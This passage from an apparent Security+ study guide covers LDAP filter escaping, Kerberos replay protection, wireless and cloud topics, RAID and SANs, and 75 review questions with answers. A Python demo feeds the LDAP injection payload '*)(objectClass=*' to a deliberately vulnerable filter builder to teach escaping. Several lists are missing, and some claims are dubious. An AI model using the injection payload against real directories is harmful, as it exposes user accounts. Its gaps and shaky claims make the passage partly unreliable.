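                or (ch == " " and i in (0, last))):
            out.append("\\" + ch)
        else:
            out.append(ch)
    return "".join(out)


def build_dn(cn: str, ous: List[str], domain: str) -> str:
    """X.500 distinguished name: the leaf (cn) first, then each OU from the
    bottom of the tree upwards, then the domain as dc components."""
    parts = [f"cn={escape_dn_value(cn)}"]
    parts += [f"ou={escape_dn_value(ou)}" for ou in ous]
    parts += [f"dc={label}" for label in domain.split(".")]
    return ",".join(parts)


def escape_filter_value(value: str) -> str:
    """RFC 4515 escaping for a value placed inside an LDAP search filter."""
    table = {"\\": r"\5c", "*": r"\2a", "(": r"\28", ")": r"\29", "\x00": r"\00"}
    return "".join(table.get(ch, ch) for ch in value)


def user_filter_unsafe(user_input: str) -> str:
    """Vulnerable: the input is pasted straight into the filter."""
    return f"(&(objectClass=user)(sAMAccountName={user_input}))"


def user_filter(user_input: str) -> str:
    """Hardened: metacharacters in the input cannot change the filter's logic."""
    return f"(&(objectClass=user)(sAMAccountName={escape_filter_value(user_input)}))"


if __name__ == "__main__":
    print(build_dn("Ian", ["IT"], "ianneil501.com"))
    payload = "*)(objectClass=*"          # classic LDAP injection payload
    print("unsafe :", user_filter_unsafe(payload))   # matches every user
    print("escaped:", user_filter(payload))          # matches nothing
```

The injected filter in the unsafe version is still syntactically valid, which is why the directory happily answers it with every user object; the escaped version turns the same characters into literal text that no account name will match.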

Each update to an Active Directory object is given an Update Sequence Number (USN) that increases with every change made on that domain controller: if the last change was USN 22, the next change is USN 23 and the one after that is USN 24. Each change is also stamped with the time it happened, which is known as being timestamped. USNs are how domain controllers keep track of which changes still need to be replicated.

All computers in an Active Directory domain must have their time synchronized to within five minutes of the domain controller, otherwise Kerberos authentication fails. A replay attack is where an attacker intercepts legitimate traffic (for example, by a man-in-the-middle attack) and retransmits it later to impersonate the original sender.

Kerberos prevents replay attacks with timestamps: every authenticator a client sends carries the current time, and the server rejects any authenticator that falls outside the permitted clock skew or that it has already seen within that window. A captured Kerberos exchange replayed later is therefore rejected. (USNs belong to Active Directory replication, not to Kerberos itself.)
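The mechanism just described (a timestamped authenticator protected by the session key, a skew check, and a short-lived replay cache on the server) can be shown in a few lines. The following Python example is added here and is not from the book; it is a simplified model of the Kerberos authenticator check, not the real protocol: the authenticator is an HMAC over the client name and timestamp rather than an encrypted Kerberos message, the session key is simply assumed to be shared already, and the five-minute skew is the Kerberos default. It shows the three rejections a service makes: an altered authenticator, a stale one, and a replayed one.

```python
import hashlib
import hmac
from dataclasses import dataclass
from typing import Dict, Set, Tuple

MAX_SKEW = 300   # seconds: Kerberos' default tolerance for clock skew (5 minutes)


@dataclass(frozen=True)
class Authenticator:
    client: str
    timestamp: int   # the client's clock, in seconds
    mac: str         # integrity check over client|timestamp using the session key


def make_authenticator(client: str, session_key: bytes, now: int) -> Authenticator:
    msg = f"{client}|{now}".encode()
    return Authenticator(client, now, hmac.new(session_key, msg, hashlib.sha256).hexdigest())


class Service:
    """A Kerberized service holding one session key per client (assumed to
    have been delivered in a ticket) and a replay cache of recent authenticators."""

    def __init__(self, session_keys: Dict[str, bytes]):
        self.session_keys = session_keys
        self.replay_cache: Set[Tuple[str, int, str]] = set()

    def accept(self, auth: Authenticator, now: int) -> str:
        key = self.session_keys.get(auth.client)
        if key is None:
            return "rejected: unknown client"
        expected = hmac.new(key, f"{auth.client}|{auth.timestamp}".encode(),
                            hashlib.sha256).hexdigest()
        if not hmac.compare_digest(expected, auth.mac):
            return "rejected: integrity check failed (altered)"
        if abs(now - auth.timestamp) > MAX_SKEW:
            return "rejected: clock skew too great"
        entry = (auth.client, auth.timestamp, auth.mac)
        if entry in self.replay_cache:
            return "rejected: replay"
        self.replay_cache.add(entry)
        # Entries older than the skew window can no longer pass the skew check,
        # so they can be dropped; this keeps the cache small.
        self.replay_cache = {e for e in self.replay_cache if now - e[1] <= MAX_SKEW}
        return "accepted"


if __name__ == "__main__":
    key = b"session-key-from-ticket"          # assumed shared secret
    svc = Service({"ian": key})
    a = make_authenticator("ian", key, now=1000)
    print(svc.accept(a, now=1000))            # accepted
    print(svc.accept(a, now=1010))            # rejected: replay
    print(svc.accept(a, now=1400))            # rejected: clock skew too great
```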

Exam tip:
Ensure you know the secure version of all of the protocols.

Switching – use case

A switch is an internal device that connects all of the users in the LAN so that they can communicate with each other. As we have seen in previous chapters, a computer connects to a wall jack into a patch panel, and then from the patch panel to the switch. Let's look at the functionality and protocols used by a switch:

Simple network management protocol – use case

Networks are very large and have many different devices; there needs to be some sort of monitoring software to ensure that the devices are still functioning. We use two different versions of SNMP:

Implementing wireless security

Wireless communication is now part of everyday life, from using 4G on your mobile phone to access the internet to using Bluetooth to listen to music as you walk down the road. However, if your wireless device is insecure, it can lead to data loss and maybe someone stealing funds from your bank account. Let's first look at the different types of wireless networks:

Exam tip:
A guest wireless network gives contractors access to the internet; it could also be used by employees at lunchtime.

Wireless access points – controllers

Wireless access points help extend the wireless network and there are two different types of controllers:

Exam tip:
A thin controller is used to manage multiple wireless access points remotely.

Securing access to your wireless access point

Without the use of encryption, there are three simple methods for securing access to your wireless access point:


Figure 27: SSID


Figure 28: MAC filtering

Wireless bandwidth/band selection

There are different wireless standards, and we need to know the limitations of each. The band selection is also known as the frequency:

Standard   Frequency         Speed                  Remarks
802.11a    5 GHz             54 Mbps                20 MHz channels; shorter range than 2.4 GHz but less interference
802.11b    2.4 GHz           11 Mbps                22 MHz channels in the crowded 2.4 GHz band
802.11g    2.4 GHz           54 Mbps                20 MHz channels; backward compatible with 802.11b
802.11n    2.4 GHz / 5 GHz   150 Mbps per stream    MIMO (multiple input, multiple output); optional 40 MHz channel bonding; travels the furthest distance

Wireless channels

In the Security+ exam, the 2.4 GHz wireless channels run from channel 1 up to channel 11, and the device placement should be:

We place neighbouring devices on channels as far apart as possible to prevent overlap of adjacent channels and interference; in the 2.4 GHz band, channels 1, 6, and 11 are the non-overlapping set. Wireless devices can also suffer interference from elevators, baby monitors, cordless phones, metal racking, and load-bearing walls.

Wireless antenna types and signal strength

There are three main antenna types:


Figure 29

Wireless coverage

One of the security implications of having a wireless network is ensuring that coverage gives users access to resources in a timely fashion without the signal extending beyond the company's boundaries, where an attacker could reach it. Let's look at each of these in turn:

Exam tip:
If a newly installed WLAN is not fully functional, the site survey may not have been carried out properly.

Wireless encryption

So that we can secure our wireless network, we need to choose a form of encryption, ranging from WEP, which is the weakest, to WPA2—CCMP, which is the strongest. Let's look at each of these in turn:

Wireless – open system authentication

If we want to set up a wireless network for the general public to access without any encryption or any passwords, we could use the Open System Authentication but the users would have to access the WAP at their own risk.

Wireless – WPS

When we connect a device such as a gaming console to our wireless network, we may use Wi-Fi Protected Setup (WPS), where the passphrase is already stored on the access point and all you need to do is press the button (or enter an eight-digit PIN) to get connected. The PIN method is vulnerable to brute force, because the access point confirms each half of the PIN separately, so WPS should be disabled on any access point that is not purely a home device.

Wireless – captive portal

When you join the wireless network at the airport, you are connected to the free Wi-Fi yet you cannot access the internet right away. It redirects you to a captive portal where you need to enter your email address, put in your Facebook credentials, or pay for the premium wireless network.

Wireless attacks

There are two main types of attacks relating to wireless networks:

Wireless authentication protocols

There are numerous wireless authentication protocols:

Review questions

  1. What is the lowest layer of the OSI reference model at which a switch operates?

  2. At which layer of the OSI reference model does a router operate?

  3. Which layer of the OSI Reference Model does a VLAN operate?

  4. On which layer of the OSI Reference Model does a Web Application Firewall work?

  5. What is the purpose of a Web Application Firewall and where is it normally placed?

  6. What is the default setting for a firewall?

  7. What is implicit deny and which two devices does it affect?

  8. If traffic is not arriving at my VLAN, what should I do?

  9. Which port type is connection-orientated and why?

  10. Which type of port would I use for streaming video?

  11. What is the firewall that does content filtering, URL filtering, and malware inspection?

  12. Which network device connects two networks together?

  13. Which type of internal device connects users on the same network?

  14. Which type of device hides the internal network from hackers on the internet?

  15. What is an inline NIPS?

  16. Which type of IPS protects virtual machines from attack?

  17. Which type of IDS is placed behind the firewall as an additional layer of security?

  18. If I don't have a NIDS on my network, which device can passively monitor network traffic?

  19. What is the difference between a signature-based and an anomaly-based NIDS?

  20. What is the passive device that sits on your internal network?

  21. If I receive an alert that Server 1 has a virus and I inspect the server and there are no viruses, what is this known as?

  22. How can I prevent someone from accessing the medical center's network by plugging their laptop into a port in the waiting room?

  23. How can I prevent someone from plugging a rogue access point into my network?

  24. How do 802.1x and port security differ? Which one gives me more functionality?

  25. Which device can be installed on a switch to prevent a DDoS attack?

  26. Which is the purpose of web caching on a proxy server?

  27. Which type of proxy verifies that the request is valid before web caching?

  28. What is the purpose of a VPN?

  29. What happens in the IKE phase of a VPN session?

  30. What is the purpose of a VPN concentrator?

  31. What is the most secure VPN tunneling protocol?

  32. What type of VPN uses SSL certificates?

  33. How many keys does symmetric encryption use and what are the benefits over asymmetric encryption?

  34. In which modes would you use an L2TP/IPSec tunnel across the internet, and then internally?

  35. Which VPN session type would you use on a site-to-site VPN?

  36. What network device should you use to manage a high volume of web traffic?

  37. How does active/passive clustering work?

  38. What type of network is used by a virtual network so that the route requests are forwarded to a controller?

  39. How should I set up my voice traffic so that I can control the bandwidth across my internal network?

  40. What is the purpose of a Demilitarized Zone (DMZ) and what type of web server is located there?

  41. What is the difference between NAT and PAT?

  42. If I want to find out what attack methods a potential hacker is using, what do I need to set up?

  43. What is the purpose of network access control? Name the two agents that it uses.

  44. What type of network device would check that there is no spam before the mail is delivered to the internal mail server?

  45. What type of device can be used to automate the collection of log files across many different devices?

  46. If I wanted to back up data to a backup device but at the same time prevent someone from deleting the data, what device do I need to use?

  47. What can be used to ensure that someone cannot steal sensitive data by using a USB flash drive or emailing the data to their personal email account?

  48. What is a port mirror that could also be called a tap?

  49. Which protocol should I use to download very large files from the internet?

  50. Which email client does not retain a copy on the mail server?

  51. What type of records are created by DNSSEC?

  52. When my Windows DNS server is not available, which Linux server could I use for name resolution and which port number does it use?

  53. Which protocol uses ports 5060/5061?

  54. Which ports does NETBIOS use?

  55. If I want to access information from Active Directory securely, which protocol and port should I use?

  56. If I want to run a command securely on a CISCO router, which protocol and port should I use?

  57. Which secure protocol should I use to find out a report on the utilization of network devices?

  58. What are the two portions of an IPSec packet?

  59. Which authentication protocol can prevent replay attacks and how?

  60. How can I tell whether my laptop fails to get an IP address from a DHCP server?

  61. What type of IP address is 2001:123A:0000:0000:ABC0:00AB:0DC5:0023 and how can we simplify it?

  62. Describe subscription services.

  63. What type of wireless network does not use a WAP to connect two devices together?

  64. What is the strongest version of wireless encryption?

  65. Which Stratum time server is the atomic time server or reference time source?

  66. If I disable SSID broadcasting from my wireless router, which two methods can I use to discover the SSID?

  67. I have just installed a new tablet onto my network and it still cannot access the WAP. Other users can connect easily, I have checked the encryption types and login details and they are correct. What stage has been missed?

  68. What type of wireless controller will allow me to administer seven WAPs?

  69. What is the benefit of installing an omnidirectional antenna?

  70. What could be a problem with installing a directional antenna?

  71. What type of wireless method uses a password to connect to the WAP?

  72. If I own a coffee shop and want to provide a wireless network for my customers that does not require any administration from my side, how should I set it up?

  73. I have joined the wireless network at the airport, but I cannot connect to the internet. What is preventing this?

  74. What type of wireless authentication protocol is encapsulated inside PEAP?

  75. Why should I not use PAP?

Answers and explanations

  1. Layer 2 of the OSI Reference Model is the lowest layer. The data-link layer is the lowest layer that a switch operates at.

  2. A router works at Layer 3 of the OSI Reference Model as it works on IP addresses.

  3. A VLAN is created on a switch that works at layer 2 of the OSI Reference Model.

  4. A Web Application Firewall works at Layer 7 of the OSI Reference Model.

  5. A web application firewall is normally placed in front of the web server (or installed on it as a module), as its job is to protect web applications from attack.

  6. The default setting for a firewall is block all, allow by exception.

  7. Implicit deny is used by both the firewall and the router where the last rule is deny all. Should there not be an allow rule, then the last rule applies and it is known as implicit deny.

  8. If the VLAN traffic is not arriving, check that the VLAN tag is set up properly as it tells the VLAN traffic where to go.

  9. A TCP Port is connection-orientated as it uses a three-way handshake to set up the session. It also acknowledges when the packets arrive.

  10. A UDP port would be used for streaming video as it is connectionless and faster than TCP.

  11. The Unified Threat Management (UTM) is a firewall that provides value for money as it can provide URL filtering, content filtering, malware inspection, as well as the firewall functionality.

  12. A router connects different networks together and works at layer 3 of the OSI Reference Model.

  13. Users on the same network are usually connected together using a switch on a star topology.

  14. A Network Address Translator (NAT) hides the internal network from those on the external network.

  15. An inline NIPS is where the incoming traffic passes through and is screened by the NIPS.

  16. A host-based IPS (HIPS) is installed inside the guest virtual machine to protect it from attacks.

  17. A network-based IPS (NIPS) is placed behind the firewall as an additional layer of security. The firewall prevents unauthorized access to the network.

  18. If there is no NIDS on the network, a NIPS can be configured to monitor and alert only; it then provides the same visibility as a NIDS, even though it is not normally described as a passive device.

  19. A signature-based NIDS matches traffic against a database of known attack patterns, whereas an anomaly-based NIDS starts from a baseline of normal behaviour and learns to flag new patterns or threats that deviate from it.

  20. A passive device that sits inside your network is a NIDS.

  21. If one of the monitoring systems reports a virus but when you physically check you find no virus, this is known as a false positive.

  22. If we enable port security and turn the port off on the switch, it will prevent further use of the wall jack.

  23. To prevent a rogue access point attaching to your network, you would enable 802.1x on the switch itself. 802.1x ensures that the device is authenticated before it is allowed to use the port.

  24. 802.1x on a managed switch authenticates the device before granting access, whereas port security merely disables the port. 802.1x gives more functionality; if we keep disabling ports on a switch, it loses usable capacity.

  25. A flood guard can be installed on a switch to prevent DDoS attacks.

  26. Web caching on a proxy server keeps copies of web pages locally, ensuring faster access to the pages and avoiding the need to open a session to the internet.

  27. A non-transparent proxy ensures that all requests are validated before being carried out.

  28. The purpose of a VPN is to create a tunnel across unsafe networks from home or a hotel to the workplace.

  29. In the IKE phase of an IPSec session, Diffie-Hellman over UDP port 500 negotiates the keys and sets up a secure session before the data is transferred.

  30. The purpose of a VPN concentrator is to set up the secure sessions for a VPN.

  31. The most secure VPN tunnel is L2TP/IPSec, which uses AES encryption for the ESP.

  32. An SSL VPN is the only VPN to use SSL certificates.

  33. Symmetric encryption uses one key to both encrypt and decrypt. It is much faster than asymmetric encryption, which uses two keys, so it is used to encrypt large amounts of data.

  34. L2TP/IPSec should be used in Tunnel Mode across the internet or external networks, and in Transport Mode internally.

  35. When setting up a site-to-site VPN, it should be used in always-on mode as opposed to dial on demand.

  36. A load balancer should be used to manage a high volume of web traffic, as it sends each request to the least-utilized node that is healthy.

  37. Both the active and passive nodes share the same quorum disk; the passive node polls the active node and, when the active node fails, the passive node takes over.

  38. SDN is used in a virtual environment where the routing requests are forwarded to a controller.

  39. A voice VLAN should be set up to manage the flow of voice traffic, isolating it from the rest of the network.

  40. The DMZ is a boundary layer that hosts an extranet server; it is sometimes known as the extranet zone.

  41. NAT maps one internal connection to one external connection and hides the internal network. PAT maps multiple internal connections to one external connection.

  42. If you set up a honeypot, which is a website with lower security, you will be able to monitor the attack methods being used and then harden your actual web server against those attacks.

  43. Network access control ensures that devices connecting to your network are fully patched. There are two agents: one that is permanent and one that is dissolvable, for a single use.

  44. A mail gateway can be placed on the network in front of the mail server to prevent spam reaching the mail server.

  45. A SIEM server can correlate log files from many devices and notify you of potential attacks.

  46. If data is backed up to a WORM (write-once, read-many) drive, the data cannot be deleted or altered.

  47. Data Loss Prevention (DLP) prevents sensitive data being emailed out or taken from a file server using a USB drive.

  48. A port mirror is where a copy of the data going to a port on a switch is diverted to another device for analysis; this is also called a tap.

  49. FTPS, which uses TCP ports 989/990, can download very large files quickly.

  50. POP3 downloads the complete email and does not retain a copy on the mail server.

  51. DNSSEC creates RRSIG records (a signature over each signed record set) and DNSKEY records, which publish the zone-signing and key-signing public keys used to verify those signatures.

  52. When a Windows DNS server is not available, hostname resolution can be carried out by a Linux/UNIX BIND server; as it does hostname resolution, it uses port 53.

  53. Session Initiation Protocol (SIP), which sets up the connection for voice traffic, uses port 5060 (UDP or TCP) and port 5061 for SIP over TLS.

  54. NetBIOS uses UDP port 137 (name service), UDP port 138 (datagram service) and TCP port 139 (session service), and also a flat file called the LMHOSTS file.

  55. LDAPS on TCP port 636 accesses Active Directory information securely.

  56. Secure Shell (SSH) on TCP port 22 is used to run remote commands on a router.

  57. SNMPv3 is the secure version of the Simple Network Management Protocol that collects reports and statistics from network devices.

  58. An IPSec packet has an Authentication Header (AH), which provides integrity using SHA-1 or MD5, and an Encapsulating Security Payload (ESP), which provides encryption using DES, 3DES, or AES.

  59. Kerberos is an authentication protocol that uses timestamps in its authenticators, together with a replay cache on the server, to prevent replay attacks: an authenticator outside the five-minute skew or one that has been seen before is rejected. It is also the authentication protocol that uses tickets.

  60. If you cannot get an IP address from a DHCP server, you will receive a 169.254.x.x APIPA address.

  61. It is an IP Version 6 address. You simplify it by removing the leading zeros from each block and replacing the consecutive zero blocks with a double colon: 2001:123A::ABC0:AB:DC5:23.

  62. Subscription services are where software is leased, for example Office 365, where you get not only email but the Office packages as well.

  63. An ad hoc wireless network allows two devices to connect without a WAP.

  64. The strongest version of wireless encryption covered is WPA2-CCMP, as it uses AES.

  65. Stratum 0 is the ultimate time source; Stratum 1 servers synchronize their time with it.

  66. A wireless packet sniffer or an SSID de-cloaking tool can discover the SSID even if the SSID broadcast has been disabled.

  67. When connecting a new device where everything else appears to be right, it could be that the device's MAC address has not yet been added to the MAC filtering allow list.

  68. A thin wireless controller can control multiple WAPs remotely.

  69. An omnidirectional antenna broadcasts the signal in all directions.

  70. A directional antenna only broadcasts in one direction; therefore, if it is pointing in the wrong direction, the users will not be able to connect to the network.

  71. PSK is a method of connecting to the wireless network using the WAP password.

  72. Open System Authentication allows the public to connect to the WAP without any authentication.

  73. In this scenario, the user has connected to the captive portal at the airport, which may need your email address, Google account, or Facebook account before it lets you onto the free Wi-Fi network.

  74. PEAP wraps an inner EAP method (commonly EAP-MSCHAPv2) inside a TLS tunnel.

  75. PAP sends the password in clear text, making it very insecure.

Understanding Cloud Models and Virtualization

In this chapter, we will be learning about the deployment and security issues of virtualization. We will get acquainted with the deployment and storage environments of the cloud models. We will also learn about different scenarios to learn when to use on-premises, hosted, and cloud environments.

We will cover the following exam objectives in this chapter:

Cloud computing

The demand for cloud services has risen in recent years as the workforce has become more mobile; a cloud solution is very cost-effective and maintains the high availability of systems. Before you decide to move to a cloud service provider (CSP), you need to be satisfied that you can trust them with your data and systems.


This module will look at different cloud models, coupled with cloud storage and how machines in the cloud are created. There are many good reasons why cloud computing has become popular:

When they move to the cloud, they roll out one image and the CSP clones it, so they no longer need to reimage each laptop. Today, they are delivering Word 2016, so the cloud machines need an i5 processor with 4 GB of RAM for 2 days. They go to a CSP and lease the hardware specification that they need.

The next week, in another location, they will deliver Skype for Business. There is still no need to reimage the laptops, but they now lease quad-core i7 processors with striped disk sets and 64 GB of RAM. The course is now 5 days, so it is longer and more expensive. The image is uploaded and the cloud machines are upgraded, resulting in a much higher cost because they are using more resources, but they do not need to purchase the additional hardware, so the setup is still more cost-effective.


Normally, when a new site is opened, it needs to invest $50,000 in IT equipment, so the company has turned to a cloud model for the new equipment. They will lease the offices until sufficient sales have been made to invest in purchasing a property. All of the employees will have laptops and high-speed fiber broadband.

The network infrastructure will be cloud-based, therefore there is no need to purchase physical servers that would have an impact in reducing their cashflow. Cashflow is maintained, even though new equipment has been provided.

If they move to the cloud, it is going to cost them $60,000 a year. However, they don't need to find the whole $250,000 in one lump sum as the CSP will update their hardware perpetually so that the hardware will never be obsolete.

It will also help the company maintain a better cashflow, as capital expenditure is not required. The difference in price is 1.8% higher per year, which could be justified as there are no maintenance fees or disaster recovery site required, making it very cost-effective. The CSP deals with maintenance and disaster recovery as part of the cloud plan.

Exam tip:
Private cloud = single tenant. Public cloud = multitenant.
Community cloud = same industry.

Implementing different cloud deployment models

We will first look at the different cloud models and their characteristics. The most common cloud model is the public cloud, so let's start with that:


Figure 1: Public cloud

Just like in the public cloud, none of the tenants owns their apartment.

Example: A small company does not want to invest $50,000 in IT systems, so they purchase their cloud package from a cloud provider where they and another company are hosted by the cloud provider. This is similar to someone renting one apartment in a block from a landlord—you lease but do not own the flat. This is a multitenant environment where the cloud provider has multiple companies on the same virtual host.


Figure 2: Private cloud

Example: An insurance company wants its sales staff on a cloud environment where they can access resources from anywhere—whether they are at home, at a customer's site, or in a hotel room. The problem they have is that they do not wish to share resources with other cloud tenants. Therefore, they purchase the hardware and their IT team hosts its own private cloud. The benefit of this is that the sales team can access any resources they want at any time of day or night.

This is known as single-tenant: like owning your own home, they buy the equipment themselves.


Figure 3: Community cloud

In the preceding diagram, you can see lawyers on the left-hand side and on the right-hand side a group of medical people—doctors and nurses. The lawyers cannot share the same software package as the medical people, since they have different requirements. Therefore, Community Cloud 1 is for lawyers who have brainstormed and financed the perfect legal application, which is hosted in the cloud—this is private to them. Community Cloud 2 is for a group of medical people, perhaps two hospitals, who have designed and shared the cost of making the perfect medical software package, which is hosted by the CSP.

Three of the largest pawnbroking companies enter into a business venture where they get together and design the perfect application to enable their companies to be more efficient and save labor costs over time. The cloud provider creates this application and hosts it. This saves them the costs of purchasing new hardware. The cloud provider will also back up the data each night and guarantee a 99.99% availability of the systems. This is known as a community cloud as the application is no good to anyone who is not a pawnbroker.


Figure 4: Hybrid cloud

In the bottom left-hand corner, we have a brick factory. This is known as on-premises, where the company owns a brick-and-mortar building. In the top left are servers in the cloud. The cloud access security broker (CASB) enforces the company's policies between the on-premises situation and the cloud.

Cloud service models

There are different types of cloud services, and these are very heavily tested in the Security+ exam, so we will show screenshots of the types of offerings. We will first look at infrastructure as a service, which is the model that you have more control over:



Figure 5: Microsoft's IaaS offering (July 2018)

Exam tip:
IaaS is where you will install the operating system and patch it. This is the model you have more control over.



Figure 6: Goldmine—SaaS


Figure 7: Salesforce—SaaS


Figure 8: Microsoft Office 365—SaaS


Figure 9: Okta security as a service (SECaaS) for Google Apps

The preceding diagram shows Okta providing secure web authentication into Google Apps.

Disk resiliency and redundancy

We are going to look at different disk setups—some of which can provide fault tolerance or redundancy, meaning that if a disk fails, then the data is still available. RAID 0 is used for faster disk access, but provides neither fault tolerance nor redundancy. Let's first look at the different RAID setups, as these will be heavily tested.

Redundant array of independent disks

There is a need for the disk setup on servers to provide redundancy; this is where if one disk fails, the data is still available. We have already looked at failover clustering in Chapter 5, Understanding Network Components, where two servers share a quorum disk—the single point of failure in that scenario would be the shared disk. We are going to look at different Redundant Array of Independent Disks (RAID) levels and their characteristics:


Figure 10: RAID 0

This is known as a stripe set, as the data is written across Disks 1-3 in 64 KB stripes. Should one disk fail, then all of the data will be lost, so RAID 0 does not provide fault tolerance or redundancy. The benefit of RAID 0 is its faster read access, so it may be used for the proxy server's cache.


Figure 11: RAID 1

You can see from the preceding mirror set that the disk on the left has the original data and the disk on the right is a copy of that data. Should Disk 1 fail, you would "break the mirror" and then Disk 2 would provide the copy of the data for those who need access to it. At a later stage, we will add another disk and then reestablish the mirror set.


Figure 12: RAID 5

RAID 5 can suffer a single-disk failure but still allow access to the data, as the parity bits can recreate the missing data, but access will be slower than normal. This will give the IT team time to replace the missing disk.

Example: The following diagram represents the same RAID 5 set, but uses a mathematical equation to represent the disk set so that you can see the impact of losing one disk and then losing two disks:


Figure 13: RAID 5 as a mathematical equation

Each of the disks has a numerical value. For example, if Disk 3 fails, the equation would be (7 + ? = 10) and the answer would be 3. If we then lose a second disk, Disk 1, the equation would be (? + ? = 10), which you could not work out; this is what happens whenever you lose two disks—parity cannot recreate the missing data.


Figure 14: RAID 6

A RAID 5 disk set can afford to lose one disk but still be available. The good thing about a RAID 6 set is that it can lose two disks and still be redundant as it has double parity.
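The RAID 5 arithmetic above carried through in working code, as an added example that is not from the book: parity is the XOR of the data blocks in a stripe, one lost disk is rebuilt from the survivors (7 + ? = 10), and two lost disks leave two unknowns that single parity cannot recover, which is the gap RAID 6's double parity closes (not implemented here). Disk count, block size and the sample payload are constructed for the demonstration.

```python
from functools import reduce


def xor_blocks(blocks):
    """XOR equal-length byte strings together: this is the RAID parity calculation.
    It plays the role of the book's addition (7 + 3 = 10): given the parity and all
    but one block of a stripe, the missing block is the XOR of the rest."""
    return bytes(reduce(lambda a, b: a ^ b, column) for column in zip(*blocks))


def raid5_write(data, n_disks=3, block_size=64 * 1024):
    """Lay `data` out as a RAID 5 set and return a list of n_disks 'disks', each a
    list of blocks. Every stripe holds n_disks - 1 data blocks plus one parity
    block, and the parity block rotates across the disks from stripe to stripe."""
    if n_disks < 3:
        raise ValueError("RAID 5 needs a minimum of three disks")
    data_per_stripe = (n_disks - 1) * block_size
    padded = data + b"\x00" * (-len(data) % data_per_stripe)  # pad the last stripe
    disks = [[] for _ in range(n_disks)]
    for stripe_no, start in enumerate(range(0, len(padded), data_per_stripe)):
        chunk = padded[start:start + data_per_stripe]
        blocks = [chunk[i:i + block_size] for i in range(0, data_per_stripe, block_size)]
        parity_disk = stripe_no % n_disks
        parity = xor_blocks(blocks)
        remaining = iter(blocks)
        for disk in range(n_disks):
            disks[disk].append(parity if disk == parity_disk else next(remaining))
    return disks


def raid5_read(disks, failed=(), data_len=None):
    """Read the data back; `failed` holds the indexes of disks that have been lost.
    With one failed disk every missing block is rebuilt from the surviving blocks
    of its stripe (7 + ? = 10, so ? = 3). With two failed disks there are two
    unknowns per stripe (? + ? = 10) and single parity cannot recover them."""
    failed = set(failed)
    if len(failed) > 1:
        raise RuntimeError("RAID 5 cannot recover from %d failed disks" % len(failed))
    n_disks, n_stripes = len(disks), len(disks[0])
    out = bytearray()
    for stripe_no in range(n_stripes):
        parity_disk = stripe_no % n_disks
        stripe = [None if d in failed else disks[d][stripe_no] for d in range(n_disks)]
        if failed:
            (lost,) = failed
            survivors = [block for d, block in enumerate(stripe) if d != lost]
            stripe[lost] = xor_blocks(survivors)  # rebuild the missing block
        for d in range(n_disks):
            if d != parity_disk:
                out += stripe[d]
    return bytes(out if data_len is None else out[:data_len])


def recoverable(disks, failed, data_len):
    """True when the set can still serve all of its data after losing `failed` disks."""
    try:
        return raid5_read(disks, failed, data_len) is not None
    except RuntimeError:
        return False


if __name__ == "__main__":
    # Constructed sample: a short payload with 4-byte blocks so the layout is readable.
    payload = b"CompTIA Security+ RAID 5 parity demo"
    disks = raid5_write(payload, n_disks=3, block_size=4)
    cases = (("no failure", set()), ("Disk 3 lost", {2}), ("Disks 1 and 3 lost", {0, 2}))
    for name, lost in cases:
        print("%-20s recoverable: %s" % (name, recoverable(disks, lost, len(payload))))
```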


Figure 15: RAID 10

From this diagram, you can see a RAID 1 mirror on the left that is then striped, so this will allow you to lose two disks.

Storage area network

A storage area network (SAN) is a hardware device that contains a large number of fast disks, such as solid-state drives (SSDs), and is isolated from the LAN as it has its own network. A SAN typically has host bus adapters (HBAs) (https://searchstorage.techtarget.com/definition/host-bus-adapter) and switches (https://searchnetworking.techtarget.com/definition/switch) attached to storage arrays and servers. The disks are set up with some form of redundancy, such as RAID 5 and upward, so that the storage space is redundant:


Figure 16: Storage area network

Each switch and storage system on the SAN must be interconnected, and the physical interconnections must support bandwidth levels that can adequately handle peak data activities. There are two connection types:

The servers that use SAN storage are diskless, but use the SAN storage as if they had disks installed; you need very fast connection speeds so that the server does not suffer performance issues. Example: Server 1 is a virtual host and it needs another 200 TB of data to host more virtual machines. It connects to the SAN using Ethernet and Ethernet switches; this connector is known as an iSCSI connector:


Figure 17: SAN—iSCSI Connector

The SAN allocates 200 TB by giving it a logical unit number (LUN). This is known as an iSCSI target. Server 1, which has been allocated the space, is known as the iSCSI initiator. Server 1 is diskless but still sets up the disk space using disk management as if it were a physical disk. To prevent latency, the connection between Server 1 and the SAN must be fast.

Understanding cloud storage concepts

It is quite common to use cloud storage to hold your data, such as iCloud provided by Apple, Google Drive provided by Google, OneDrive provided by Microsoft, or Dropbox provided by Dropbox, Inc. The consumer versions of cloud storage allow you to have limited storage space, but offer to sell you a business version or additional storage by charging a monthly subscription fee. Let's look at the following image:


Figure 18: Cloud storage

In this diagram, you can see on the left-hand side a datacenter that has a vast number of storage servers in a configuration called a server farm. The datacenter is a secure location where your data resides, but the data must stay within your world region. The datacenter has a backup datacenter to provide redundancy. The storage on these servers is likely to be diskless SAN storage.

Exploring virtual networks

A virtual network is very similar to a physical network in many ways, but for the Security+ exam, we must know the concepts of virtualization. To be able to host a virtual environment, we must install a hypervisor on a computer hosting the virtual machines. There are two different types of hypervisor:

Exam tip: A Type 1 hypervisor can be installed on a bare-metal machine—examples are VMware, Hyper-V, and ESX.

The main server in a virtual environment is called a host and the virtual machines are called guests. This is very similar to a party where the person holding the party is a host and the people attending the party are called guests. There are various different components to virtualization:


Figure 19: Virtualization

Now, we will look at each of the components:

Example: Server 1 is a virtual host, already has 50 guest machines, and is running out of physical disk space, but there is a requirement for Server 1 to host another 20 guest machines. There is enough memory and there are enough processing cores, but there is a lack of disk space. The solution would be to create a LUN on the SAN, giving Server 1 another 10 TB of disk space that it can allocate to the new virtual machines. Server 1 then connects to the SAN and configures the disk space allocated in disk management.


Figure 20: Virtual host with two guest machines


Figure 21: Virtual switch—Internal Network 1 with VLAN 2


Figure 22: Snapshot of Server 2016

Exam tip:
When we create a VLAN on a SAN, we will always use an iSCSI connector.

Virtual desktop infrastructure

A virtual desktop infrastructure (VDI) is a pool of virtual desktops for groups of users who share the same needs, such as a sales team whose members need access to the same applications and utilities on their desktops.

When the salespeople access their desktops, their settings are copied elsewhere; if the desktop becomes corrupt, another desktop from the pool is taken and the settings are then placed on the new desktop.

Example: A company has 50 users, who access their desktops remotely, as they are hosted in a virtual environment. There are another 100 virtual machines all set up and waiting to be allocated to users. When a user uses their virtual machine, all of their desktop settings are copied onto another disk. If the virtual machine that they are using fails, then a new virtual machine is taken from the pool and their settings are then applied so that their desktop is recovered in the span of a few minutes.

VDE

When users use a virtual machine as their desktop, they can be set up in two ways: permanent or nonpermanent:

Heating, ventilation, and air-conditioning

